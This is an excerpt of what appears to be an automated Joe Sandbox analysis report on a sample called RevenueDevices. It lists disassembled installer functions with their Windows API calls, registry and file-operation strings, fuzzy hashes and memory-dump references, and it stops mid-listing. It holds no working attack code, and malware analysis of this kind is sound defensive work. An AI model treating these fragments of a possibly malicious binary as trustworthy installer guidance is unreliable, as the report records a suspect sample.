                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Close$DeleteEnumOpen
                                          • String ID:
                                          • API String ID: 1912718029-0
                                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                          Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?), ref: 004020A3
                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                          • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                          Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                          Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                          • API String ID: 1697273262-1764544995
                                          • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                          • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                          Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00404902
                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID: $@rD
                                          • API String ID: 3748168415-881980237
                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                          Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                          • lstrlenW.KERNEL32 ref: 004026B4
                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                          • String ID: CopyFiles "%s"->"%s"
                                          • API String ID: 2577523808-3778932970
                                          • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                          • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                          Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: lstrcatwsprintf
                                          • String ID: %02x%c$...
                                          • API String ID: 3065427908-1057055748
                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                          Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                          • String ID: Section: "%s"$Skipping section: "%s"
                                          • API String ID: 2266616436-4211696005
                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                          Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(?), ref: 00402100
                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                          • String ID:
                                          • API String ID: 1599320355-0
                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                          Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                          • String ID: Version
                                          • API String ID: 512980652-315105994
                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                          Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                          • GetTickCount.KERNEL32 ref: 00403303
                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                          Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                          • String ID:
                                          • API String ID: 2883127279-0
                                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                          Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringlstrcmp
                                          • String ID: !N~
                                          • API String ID: 623250636-529124213
                                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                          Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                          • CloseHandle.KERNEL32(?), ref: 00405C71
                                          Strings
                                          • Error launching installer, xrefs: 00405C48
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: Error launching installer
                                          • API String ID: 3712363035-66219284
                                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                          Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: CloseHandlelstrlenwvsprintf
                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                          • API String ID: 3509786178-2769509956
                                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                          Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
